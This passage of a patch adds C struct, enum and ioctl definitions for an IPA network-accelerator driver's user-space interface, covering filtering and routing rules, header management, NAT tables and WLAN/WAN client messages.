+ /*! Specifies if a protocol check rule is present */
+ uint8_t protocol_eq_present;
+ /*! The value to check against the protocol (ipv6) field */
+ uint8_t protocol_eq;
+ /*! The number of ip header length offset 16 bit range check
+ * rules in this rule */
+ uint8_t num_ihl_offset_range_16;
+ /*! An array of the registered ip header length offset 16 bit
+ * range check rules */
+ struct ipa_ipfltr_range_eq_16
+ ihl_offset_range_16[IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS];
+ /*! The number of mask equal 32 rules present in this rule */
+ uint8_t num_offset_meq_32;
+ /*! An array of all the possible mask equal 32 rules in this rule */
+ struct ipa_ipfltr_mask_eq_32
+ offset_meq_32[IPA_IPFLTR_NUM_MEQ_32_EQNS];
+ /*! Specifies if the traffic class rule is present in this rule */
+ uint8_t tc_eq_present;
+ /*! The value to check the traffic class (ipv4) field against */
+ uint8_t tc_eq;
+ /*! Specifies if the flow equals rule is present in this rule */
+ uint8_t fl_eq_present;
+ /*! The value to check the flow (ipv6) field against */
+ uint32_t fl_eq;
+ /*! The number of ip header length offset 16 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_16_present;
+ /*! The ip header length offset 16 bit equation */
+ struct ipa_ipfltr_eq_16 ihl_offset_eq_16;
+ /*! The number of ip header length offset 32 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_32_present;
+ /*! The ip header length offset 32 bit equation */
+ struct ipa_ipfltr_eq_32 ihl_offset_eq_32;
+ /*! The number of ip header length offset 32 bit mask equations in
+ * this rule */
+ uint8_t num_ihl_offset_meq_32;
+ /*! The ip header length offset 32 bit mask equation */
+ struct ipa_ipfltr_mask_eq_32
+ ihl_offset_meq_32[IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS];
+ /*! The number of ip header length offset 128 bit equations in this
+ * rule */
+ uint8_t num_offset_meq_128;
+ /*! The ip header length offset 128 bit equation */
+ struct ipa_ipfltr_mask_eq_128
+ offset_meq_128[IPA_IPFLTR_NUM_MEQ_128_EQNS];
+ /*! The metadata 32 bit masked comparison equation present or not */
+ /* Metadata based rules are added internally by IPA driver */
+ uint8_t metadata_meq32_present;
+ /*! The metadata 32 bit masked comparison equation */
+ struct ipa_ipfltr_mask_eq_32 metadata_meq32;
+ /*! Specifies if the Fragment equation is present in this rule */
+ uint8_t ipv4_frag_eq_present;
+};
+
+/**
+ * struct ipa_flt_rule - attributes of a filtering rule
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ * @to_uc: bool switch to pass packet to micro-controller
+ * @action: action field
+ * @rt_tbl_hdl: handle of table from "get"
+ * @attrib: attributes of the rule
+ * @eq_attrib: attributes of the rule in equation form (valid when
+ * eq_attrib_type is true)
+ * @rt_tbl_idx: index of RT table referred to by filter rule (valid when
+ * eq_attrib_type is true and non-exception action)
+ * @eq_attrib_type: true if equation level form used to specify attributes
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @rule_id: rule_id to be assigned to the filter rule. In case client specifies
+ * rule_id as 0 the driver will assign a new rule_id
+ */
+struct ipa_flt_rule {
+ uint8_t retain_hdr;
+ uint8_t to_uc;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_hdl;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ uint32_t rt_tbl_idx;
+ uint8_t eq_attrib_type;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint16_t rule_id;
+};
+
+/**
+ * enum ipa_hdr_l2_type - L2 header type
+ * IPA_HDR_L2_NONE: L2 header which isn't Ethernet II and isn't 802_3
+ * IPA_HDR_L2_ETHERNET_II: L2 header of type Ethernet II
+ * IPA_HDR_L2_802_3: L2 header of type 802_3
+ */
+enum ipa_hdr_l2_type {
+ IPA_HDR_L2_NONE,
+ IPA_HDR_L2_ETHERNET_II,
+ IPA_HDR_L2_802_3,
+ IPA_HDR_L2_MAX,
+};
+
+/**
+ * enum ipa_hdr_l2_type - Processing context type
+ * IPA_HDR_PROC_NONE: No processing context
+ * IPA_HDR_PROC_ETHII_TO_ETHII: Process Ethernet II to Ethernet II
+ * IPA_HDR_PROC_ETHII_TO_802_3: Process Ethernet II to 802_3
+ * IPA_HDR_PROC_802_3_TO_ETHII: Process 802_3 to Ethernet II
+ * IPA_HDR_PROC_802_3_TO_802_3: Process 802_3 to 802_3
+ */
+enum ipa_hdr_proc_type {
+ IPA_HDR_PROC_NONE,
+ IPA_HDR_PROC_ETHII_TO_ETHII,
+ IPA_HDR_PROC_ETHII_TO_802_3,
+ IPA_HDR_PROC_802_3_TO_ETHII,
+ IPA_HDR_PROC_802_3_TO_802_3,
+ IPA_HDR_PROC_MAX,
+};
+
+/**
+ * struct ipa_rt_rule - attributes of a routing rule
+ * @dst: dst "client"
+ * @hdr_hdl: handle to the dynamic header
+ it is not an index or an offset
+ * @hdr_proc_ctx_hdl: handle to header processing context. if it is provided
+ hdr_hdl shall be 0
+ * @attrib: attributes of the rule
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ */
+struct ipa_rt_rule {
+ enum ipa_client_type dst;
+ uint32_t hdr_hdl;
+ uint32_t hdr_proc_ctx_hdl;
+ struct ipa_rule_attrib attrib;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint8_t retain_hdr;
+};
+
+/**
+ * struct ipa_hdr_add - header descriptor includes in and out
+ * parameters
+ * @name: name of the header
+ * @hdr: actual header to be inserted
+ * @hdr_len: size of above header
+ * @type: l2 header type
+ * @is_partial: header not fully specified
+ * @hdr_hdl: out parameter, handle to header, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_hdr_add {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint32_t hdr_hdl;
+ int status;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - header addition parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be written to IPA HW also?
+ * @num_hdrs: num of headers that follow
+ * @ipa_hdr_add hdr: all headers need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr {
+ uint8_t commit;
+ uint8_t num_hdrs;
+ struct ipa_hdr_add hdr[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_add - processing context descriptor includes
+ * in and out parameters
+ * @type: processing context type
+ * @hdr_hdl: in parameter, handle to header
+ * @proc_ctx_hdl: out parameter, handle to proc_ctx, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_add {
+ enum ipa_hdr_proc_type type;
+ uint32_t hdr_hdl;
+ uint32_t proc_ctx_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - processing context addition parameters (support
+ * multiple processing context and commit)
+ * @commit: should processing context be written to IPA HW also?
+ * @num_proc_ctxs: num of processing context that follow
+ * @proc_ctx: all processing context need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_proc_ctxs;
+ struct ipa_hdr_proc_ctx_add proc_ctx[0];
+};
+
+/**
+ * struct ipa_ioc_copy_hdr - retrieve a copy of the specified
+ * header - caller can then derive the complete header
+ * @name: name of the header resource
+ * @hdr: out parameter, contents of specified header,
+ * valid only when ioctl return val is non-negative
+ * @hdr_len: out parameter, size of above header
+ * valid only when ioctl return val is non-negative
+ * @type: l2 header type
+ * valid only when ioctl return val is non-negative
+ * @is_partial: out parameter, indicates whether specified header is partial
+ * valid only when ioctl return val is non-negative
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_ioc_copy_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_get_hdr - header entry lookup parameters, if lookup was
+ * successful caller must call put to release the reference count when done
+ * @name: name of the header resource
+ * @hdl: out parameter, handle of header entry
+ * valid only when ioctl return val is non-negative
+ */
+struct ipa_ioc_get_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_hdr_del - header descriptor includes in and out
+ * parameters
+ *
+ * @hdl: handle returned from header add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_hdr - header deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be removed from IPA HW also?
+ * @num_hdls: num of headers being removed
+ * @ipa_hdr_del hdl: all handles need to go here back to back, no pointers
+ */
+struct ipa_ioc_del_hdr {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_del hdl[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_del - processing context descriptor includes
+ * in and out parameters
+ * @hdl: handle returned from processing context add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * ipa_ioc_del_hdr_proc_ctx - processing context deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should processing contexts be removed from IPA HW also?
+ * @num_hdls: num of processing contexts being removed
+ * @ipa_hdr_proc_ctx_del hdl: all handles need to go here back to back,
+ * no pointers
+ */
+struct ipa_ioc_del_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_proc_ctx_del hdl[0];
+};
+
+/**
+ * struct ipa_rt_rule_add - routing rule descriptor includes in
+ * and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of routing table, it is NOT possible to add rules at
+ * the rear of the "default" routing tables
+ * @rt_rule_hdl: output parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of routing rule add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_add {
+ struct ipa_rt_rule rule;
+ uint8_t at_rear;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule - routing rule addition parameters (supports
+ * multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule_after - routing rule addition after a specific
+ * rule parameters(supports multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @add_after_hdl: the rules will be added after this specific rule
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ * at_rear field will be ignored when using this IOCTL
+ */
+struct ipa_ioc_add_rt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_mdfy - routing rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @rt_rule_hdl: handle to rule which supposed to modify
+ * @status: output parameter, status of routing rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_rt_rule_mdfy {
+ struct ipa_rt_rule rule;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_rt_rule - routing rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of routing rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_rt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_del - routing rule descriptor includes in
+ * and out parameters
+ * @hdl: handle returned from route rule add operation
+ * @status: output parameter, status of route rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_rt_rule - routing rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @ipa_rt_rule_del hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_rt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl_indx - routing table index lookup parameters
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @index: output parameter, routing table index, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl_indx {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t idx;
+};
+
+/**
+ * struct ipa_flt_rule_add - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of filtering table?
+ * @flt_rule_hdl: out parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of filtering rule add operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_add {
+ struct ipa_flt_rule rule;
+ uint8_t at_rear;
+ uint32_t flt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule - filtering rule addition parameters (supports
+ * multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * valid only when global is 0
+ * @global: does this apply to global filter table of specific IP family
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t global;
+ uint8_t num_rules;
+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule_after - filtering rule addition after specific
+ * rule parameters (supports multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * @num_rules: number of filtering rules that follow
+ * @add_after_hdl: rules will be added after the rule with this handle
+ * @rules: all rules need to go back to back here, no pointers. at rear field
+ * is ignored when using this IOCTL
+ */
+struct ipa_ioc_add_flt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_mdfy - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @flt_rule_hdl: handle to rule
+ * @status: output parameter, status of filtering rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_mdfy {
+ struct ipa_flt_rule rule;
+ uint32_t rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_flt_rule - filtering rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_flt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_del - filtering rule descriptor includes
+ * in and out parameters
+ *
+ * @hdl: handle returned from filtering rule add operation
+ * @status: output parameter, status of filtering rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_flt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_flt_rule - filtering rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_flt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl - routing table lookup parameters, if lookup was
+ * successful caller must call put to release the reference
+ * count when done
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @htl: output parameter, handle of routing table, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_ioc_query_intf - used to lookup number of tx and
+ * rx properties of interface
+ * @name: name of interface
+ * @num_tx_props: output parameter, number of tx properties
+ * valid only when ioctl return val is non-negative
+ * @num_rx_props: output parameter, number of rx properties
+ * valid only when ioctl return val is non-negative
+ * @num_ext_props: output parameter, number of ext properties
+ * valid only when ioctl return val is non-negative
+ * @excp_pipe: exception packets of this interface should be
+ * routed to this pipe
+ */
+struct ipa_ioc_query_intf {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ uint32_t num_rx_props;
+ uint32_t num_ext_props;
+ enum ipa_client_type excp_pipe;
+};
+
+/**
+ * struct ipa_ioc_tx_intf_prop - interface tx property
+ * @ip: IP family of routing rule
+ * @attrib: routing rule
+ * @dst_pipe: routing output pipe
+ * @alt_dst_pipe: alternate routing output pipe
+ * @hdr_name: name of associated header if any, empty string when no header
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_tx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type dst_pipe;
+ enum ipa_client_type alt_dst_pipe;
+ char hdr_name[IPA_RESOURCE_NAME_MAX];
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_tx_props - interface tx propertie
+ * @name: name of interface
+ * @num_tx_props: number of TX properties
+ * @tx[0]: output parameter, the tx properties go here back to back
+ */
+struct ipa_ioc_query_intf_tx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ struct ipa_ioc_tx_intf_prop tx[0];
+};
+
+/**
+ * struct ipa_ioc_ext_intf_prop - interface extended property
+ * @ip: IP family of routing rule
+ * @eq_attrib: attributes of the rule in equation form
+ * @action: action field
+ * @rt_tbl_idx: index of RT table referred to by filter rule
+ * @mux_id: MUX_ID
+ * @filter_hdl: handle of filter (as specified by provider of filter rule)
+ * @is_xlat_rule: it is xlat flt rule or not
+ */
+struct ipa_ioc_ext_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_idx;
+ uint8_t mux_id;
+ uint32_t filter_hdl;
+ uint8_t is_xlat_rule;
+ uint32_t rule_id;
+ uint8_t is_rule_hashable;
+};
+
+/**
+ * struct ipa_ioc_query_intf_ext_props - interface ext propertie
+ * @name: name of interface
+ * @num_ext_props: number of EXT properties
+ * @ext[0]: output parameter, the ext properties go here back to back
+ */
+struct ipa_ioc_query_intf_ext_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_ext_props;
+ struct ipa_ioc_ext_intf_prop ext[0];
+};
+
+/**
+ * struct ipa_ioc_rx_intf_prop - interface rx property
+ * @ip: IP family of filtering rule
+ * @attrib: filtering rule
+ * @src_pipe: input pipe
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_rx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type src_pipe;
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_rx_props - interface rx propertie
+ * @name: name of interface
+ * @num_rx_props: number of RX properties
+ * @rx: output parameter, the rx properties go here back to back
+ */
+struct ipa_ioc_query_intf_rx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_rx_props;
+ struct ipa_ioc_rx_intf_prop rx[0];
+};
+
+/**
+ * struct ipa_ioc_nat_alloc_mem - nat table memory allocation
+ * properties
+ * @dev_name: input parameter, the name of table
+ * @size: input parameter, size of table in bytes
+ * @offset: output parameter, offset into page in case of system memory
+ */
+struct ipa_ioc_nat_alloc_mem {
+ char dev_name[IPA_RESOURCE_NAME_MAX];
+ size_t size;
+ off_t offset;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_init - nat table initialization
+ * parameters
+ * @tbl_index: input parameter, index of the table
+ * @ipv4_rules_offset: input parameter, ipv4 rules address offset
+ * @expn_rules_offset: input parameter, ipv4 expansion rules address offset
+ * @index_offset: input parameter, index rules offset
+ * @index_expn_offset: input parameter, index expansion rules offset
+ * @table_entries: input parameter, ipv4 rules table size in entries
+ * @expn_table_entries: input parameter, ipv4 expansion rules table size
+ * @ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_init {
+ uint8_t tbl_index;
+ uint32_t ipv4_rules_offset;
+ uint32_t expn_rules_offset;
+
+ uint32_t index_offset;
+ uint32_t index_expn_offset;
+
+ uint16_t table_entries;
+ uint16_t expn_table_entries;
+ uint32_t ip_addr;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_del - nat table delete parameter
+ * @table_index: input parameter, index of the table
+ * @public_ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_del {
+ uint8_t table_index;
+ uint32_t public_ip_addr;
+};
+
+/**
+ * struct ipa_ioc_nat_dma_one - nat dma command parameter
+ * @table_index: input parameter, index of the table
+ * @base_addr: type of table, from which the base address of the table
+ * can be inferred
+ * @offset: destination offset within the NAT table
+ * @data: data to be written.
+ */
+struct ipa_ioc_nat_dma_one {
+ uint8_t table_index;
+ uint8_t base_addr;
+
+ uint32_t offset;
+ uint16_t data;
+
+};
+
+/**
+ * struct ipa_ioc_nat_dma_cmd - To hold multiple nat dma commands
+ * @entries: number of dma commands in use
+ * @dma: data pointer to the dma commands
+ */
+struct ipa_ioc_nat_dma_cmd {
+ uint8_t entries;
+ struct ipa_ioc_nat_dma_one dma[0];
+
+};
+
+/**
+ * struct ipa_msg_meta - Format of the message meta-data.
+ * @msg_type: the type of the message
+ * @rsvd: reserved bits for future use.
+ * @msg_len: the length of the message in bytes
+ *
+ * For push model:
+ * Client in user-space should issue a read on the device (/dev/ipa) with a
+ * sufficiently large buffer in a continuous loop, call will block when there is
+ * no message to read. Upon return, client can read the ipa_msg_meta from start
+ * of buffer to find out type and length of message
+ * size of buffer supplied >= (size of largest message + size of metadata)
+ *
+ * For pull model:
+ * Client in user-space can also issue a pull msg IOCTL to device (/dev/ipa)
+ * with a payload containing space for the ipa_msg_meta and the message specific
+ * payload length.
+ * size of buffer supplied == (len of specific message + size of metadata)
+ */
+struct ipa_msg_meta {
+ uint8_t msg_type;
+ uint8_t rsvd;
+ uint16_t msg_len;
+};
+
+/**
+ * struct ipa_wlan_msg - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @mac_addr: mac address of wlan client
+ *
+ * wlan drivers need to pass name of wlan iface and mac address of
+ * wlan client along with ipa_wlan_event, whenever a wlan client is
+ * connected/disconnected/moved to power save/come out of power save
+ */
+struct ipa_wlan_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+};
+
+/**
+ * enum ipa_wlan_hdr_attrib_type - attribute type
+ * in wlan client header
+ *
+ * WLAN_HDR_ATTRIB_MAC_ADDR: attrib type mac address
+ * WLAN_HDR_ATTRIB_STA_ID: attrib type station id
+ */
+enum ipa_wlan_hdr_attrib_type {
+ WLAN_HDR_ATTRIB_MAC_ADDR,
+ WLAN_HDR_ATTRIB_STA_ID
+};
+
+/**
+ * struct ipa_wlan_hdr_attrib_val - header attribute value
+ * @attrib_type: type of attribute
+ * @offset: offset of attribute within header
+ * @u.mac_addr: mac address
+ * @u.sta_id: station id
+ */
+struct ipa_wlan_hdr_attrib_val {
+ enum ipa_wlan_hdr_attrib_type attrib_type;
+ uint8_t offset;
+ union {
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+ uint8_t sta_id;
+ } u;
+};
+
+/**
+ * struct ipa_wlan_msg_ex - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @num_of_attribs: number of attributes
+ * @attrib_val: holds attribute values
+ *
+ * wlan drivers need to pass name of wlan iface and mac address
+ * of wlan client or station id along with ipa_wlan_event,
+ * whenever a wlan client is connected/disconnected/moved to
+ * power save/come out of power save
+ */
+struct ipa_wlan_msg_ex {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_of_attribs;
+ struct ipa_wlan_hdr_attrib_val attribs[0];
+};
+
+struct ipa_ecm_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ int ifindex;
+};
+
+/**
+ * struct ipa_wan_msg - To hold information about wan client
+ * @name: name of the wan interface
+ *
+ * CnE need to pass the name of default wan iface when connected/disconnected.
+ * netmgr need to pass the name of wan eMBMS iface when connected.
+ */
+struct ipa_wan_msg {
+ char upstream_ifname[IPA_RESOURCE_NAME_MAX];
+ char tethered_ifname[IPA_RESOURCE_NAME_MAX];
+ enum ipa_ip_type ip;
+};
+
+/**
+ * struct ipa_ioc_rm_dependency - parameters for add/delete dependency
+ * @resource_name: name of dependent resource
+ * @depends_on_name: name of its dependency
+ */
+struct ipa_ioc_rm_dependency {
+ enum ipa_rm_resource_name resource_name;
+ enum ipa_rm_resource_name depends_on_name;
+};
+
+struct ipa_ioc_generate_flt_eq {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+};
+
+/**
+ * struct ipa_ioc_write_qmapid - to write mux id to endpoint meta register
+ * @mux_id: mux id of wan
+ */
+struct ipa_ioc_write_qmapid {
+ enum ipa_client_type client;
+ uint8_t qmap_id;
+};
+
+enum ipacm_client_enum {
+ IPACM_CLIENT_USB = 1,
+ IPACM_CLIENT_WLAN,
+ IPACM_CLIENT_MAX
+};
+/**
+ * actual IOCTLs supported by IPA driver
+ */
+#define IPA_IOC_ADD_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR, \
+ struct ipa_ioc_add_hdr *)
+#define IPA_IOC_DEL_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR, \
+ struct ipa_ioc_del_hdr *)
+#define IPA_IOC_ADD_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE, \
+ struct ipa_ioc_add_rt_rule *)
+#define IPA_IOC_ADD_RT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE_AFTER, \
+ struct ipa_ioc_add_rt_rule_after *)
+#define IPA_IOC_DEL_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_RT_RULE, \
+ struct ipa_ioc_del_rt_rule *)
+#define IPA_IOC_ADD_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE, \
+ struct ipa_ioc_add_flt_rule *)
+#define IPA_IOC_ADD_FLT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE_AFTER, \
+ struct ipa_ioc_add_flt_rule_after *)
+#define IPA_IOC_DEL_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_FLT_RULE, \
+ struct ipa_ioc_del_flt_rule *)
+#define IPA_IOC_COMMIT_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_COMMIT_HDR)
+#define IPA_IOC_RESET_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_RESET_HDR)
+#define IPA_IOC_COMMIT_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_RT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_RT, \
+ enum ipa_ip_type)
